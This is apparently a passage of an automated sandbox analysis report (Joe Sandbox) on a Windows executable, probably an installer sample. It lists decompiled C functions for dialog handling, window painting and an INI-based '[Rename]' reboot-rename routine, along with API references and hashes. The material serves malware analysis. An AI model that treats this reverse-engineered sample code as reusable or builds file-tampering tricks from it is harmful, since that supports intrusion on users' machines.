                                                                                                                                                                                                                            0x00405286
                                                                                                                                                                                                                            0x004052a3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405288
                                                                                                                                                                                                                            0x0040528d
                                                                                                                                                                                                                            0x00405296
                                                                                                                                                                                                                            0x00405629
                                                                                                                                                                                                                            0x0040563b
                                                                                                                                                                                                                            0x0040563b
                                                                                                                                                                                                                            0x00405286
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405268
                                                                                                                                                                                                                            0x0040519a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405049
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405054
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                                                                                                                                                            • LoadImageW.USER32 ref: 004050B5
                                                                                                                                                                                                                            • SetWindowLongW.USER32 ref: 004050CE
                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                                                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                                                                                                                                            • SetWindowLongW.USER32 ref: 0040527D
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 0040546B
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405620
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                                                                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                                                                                                                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t69 =  *0x422720; // 0x68b77c
						_t29 = _t69 + 0x14; // 0x68b790
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}



















                                                                                                                                                                                                                            0x00404795
                                                                                                                                                                                                                            0x004048c2
                                                                                                                                                                                                                            0x0040491f
                                                                                                                                                                                                                            0x00404923
                                                                                                                                                                                                                            0x004049f0
                                                                                                                                                                                                                            0x004049f2
                                                                                                                                                                                                                            0x004049f2
                                                                                                                                                                                                                            0x004049f8
                                                                                                                                                                                                                            0x004049f8
                                                                                                                                                                                                                            0x004049fb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404a02
                                                                                                                                                                                                                            0x00404931
                                                                                                                                                                                                                            0x00404937
                                                                                                                                                                                                                            0x00404941
                                                                                                                                                                                                                            0x0040494c
                                                                                                                                                                                                                            0x0040494f
                                                                                                                                                                                                                            0x00404952
                                                                                                                                                                                                                            0x0040495d
                                                                                                                                                                                                                            0x00404960
                                                                                                                                                                                                                            0x00404967
                                                                                                                                                                                                                            0x00404974
                                                                                                                                                                                                                            0x00404985
                                                                                                                                                                                                                            0x0040498b
                                                                                                                                                                                                                            0x00404993
                                                                                                                                                                                                                            0x004049a1
                                                                                                                                                                                                                            0x004049a7
                                                                                                                                                                                                                            0x004049a7
                                                                                                                                                                                                                            0x00404967
                                                                                                                                                                                                                            0x004049b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004049bc
                                                                                                                                                                                                                            0x004049c0
                                                                                                                                                                                                                            0x004049d0
                                                                                                                                                                                                                            0x004049d0
                                                                                                                                                                                                                            0x004049d6
                                                                                                                                                                                                                            0x004049e2
                                                                                                                                                                                                                            0x004049e2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004049e6
                                                                                                                                                                                                                            0x004049b1
                                                                                                                                                                                                                            0x004048cd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004048df
                                                                                                                                                                                                                            0x004048df
                                                                                                                                                                                                                            0x004048e4
                                                                                                                                                                                                                            0x004048e4
                                                                                                                                                                                                                            0x004048ea
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00404913
                                                                                                                                                                                                                            0x00404915
                                                                                                                                                                                                                            0x0040491a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040491a
                                                                                                                                                                                                                            0x004048cd
                                                                                                                                                                                                                            0x0040479b
                                                                                                                                                                                                                            0x0040479e
                                                                                                                                                                                                                            0x004047a3
                                                                                                                                                                                                                            0x004047b4
                                                                                                                                                                                                                            0x004047b4
                                                                                                                                                                                                                            0x004047bc
                                                                                                                                                                                                                            0x004047bf
                                                                                                                                                                                                                            0x004047c3
                                                                                                                                                                                                                            0x004047c6
                                                                                                                                                                                                                            0x004047ca
                                                                                                                                                                                                                            0x004047cd
                                                                                                                                                                                                                            0x004047d0
                                                                                                                                                                                                                            0x004047d3
                                                                                                                                                                                                                            0x004047da
                                                                                                                                                                                                                            0x004047dc
                                                                                                                                                                                                                            0x004047dc
                                                                                                                                                                                                                            0x004047e6
                                                                                                                                                                                                                            0x004047f3
                                                                                                                                                                                                                            0x004047fd
                                                                                                                                                                                                                            0x00404802
                                                                                                                                                                                                                            0x00404805
                                                                                                                                                                                                                            0x0040480a
                                                                                                                                                                                                                            0x00404821
                                                                                                                                                                                                                            0x00404828
                                                                                                                                                                                                                            0x0040483b
                                                                                                                                                                                                                            0x0040483e
                                                                                                                                                                                                                            0x00404852
                                                                                                                                                                                                                            0x00404859
                                                                                                                                                                                                                            0x0040485e
                                                                                                                                                                                                                            0x00404863
                                                                                                                                                                                                                            0x00404863
                                                                                                                                                                                                                            0x00404871
                                                                                                                                                                                                                            0x0040487f
                                                                                                                                                                                                                            0x00404891
                                                                                                                                                                                                                            0x00404896
                                                                                                                                                                                                                            0x004048a6
                                                                                                                                                                                                                            0x004048a8
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404835
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404863
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 004048FF
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404931
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                            • String ID: Call$N
                                                                                                                                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                                                                                                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                                                                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                                                                            0x004062ae
                                                                                                                                                                                                                            0x004062b7
                                                                                                                                                                                                                            0x004062be
                                                                                                                                                                                                                            0x004062c8
                                                                                                                                                                                                                            0x004062dc
                                                                                                                                                                                                                            0x00406304
                                                                                                                                                                                                                            0x0040630b
                                                                                                                                                                                                                            0x0040630f
                                                                                                                                                                                                                            0x00406313
                                                                                                                                                                                                                            0x00406333
                                                                                                                                                                                                                            0x0040633a
                                                                                                                                                                                                                            0x00406344
                                                                                                                                                                                                                            0x00406351
                                                                                                                                                                                                                            0x00406356
                                                                                                                                                                                                                            0x0040635b
                                                                                                                                                                                                                            0x0040635f
                                                                                                                                                                                                                            0x0040636e
                                                                                                                                                                                                                            0x00406370
                                                                                                                                                                                                                            0x0040637d
                                                                                                                                                                                                                            0x00406381
                                                                                                                                                                                                                            0x0040641c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406397
                                                                                                                                                                                                                            0x004063a4
                                                                                                                                                                                                                            0x004063c8
                                                                                                                                                                                                                            0x004063cc
                                                                                                                                                                                                                            0x004063eb
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063f1
                                                                                                                                                                                                                            0x004063fa
                                                                                                                                                                                                                            0x00406405
                                                                                                                                                                                                                            0x00406410
                                                                                                                                                                                                                            0x00406416
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406416
                                                                                                                                                                                                                            0x004063ce
                                                                                                                                                                                                                            0x004063d1
                                                                                                                                                                                                                            0x004063dc
                                                                                                                                                                                                                            0x004063d8
                                                                                                                                                                                                                            0x004063da
                                                                                                                                                                                                                            0x004063db
                                                                                                                                                                                                                            0x004063db
                                                                                                                                                                                                                            0x004063e3
                                                                                                                                                                                                                            0x004063e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004063e5
                                                                                                                                                                                                                            0x004063af
                                                                                                                                                                                                                            0x004063b5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004063b5
                                                                                                                                                                                                                            0x00406381
                                                                                                                                                                                                                            0x0040635f
                                                                                                                                                                                                                            0x004062de
                                                                                                                                                                                                                            0x004062e9
                                                                                                                                                                                                                            0x004062f2
                                                                                                                                                                                                                            0x004062f6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004062f6
                                                                                                                                                                                                                            0x00406427

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                                                                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0040632D
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00406416
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                                                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                                                                                                                                            • API String ID: 2171350718-2295842750
                                                                                                                                                                                                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                                                                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                                                                            0x0040100a
                                                                                                                                                                                                                            0x00401039
                                                                                                                                                                                                                            0x00401047
                                                                                                                                                                                                                            0x0040104d
                                                                                                                                                                                                                            0x00401051
                                                                                                                                                                                                                            0x0040105b
                                                                                                                                                                                                                            0x00401061
                                                                                                                                                                                                                            0x00401064
                                                                                                                                                                                                                            0x004010f3
                                                                                                                                                                                                                            0x00401089
                                                                                                                                                                                                                            0x0040108c
                                                                                                                                                                                                                            0x004010a6
                                                                                                                                                                                                                            0x004010bd
                                                                                                                                                                                                                            0x004010cc
                                                                                                                                                                                                                            0x004010cf
                                                                                                                                                                                                                            0x004010d5
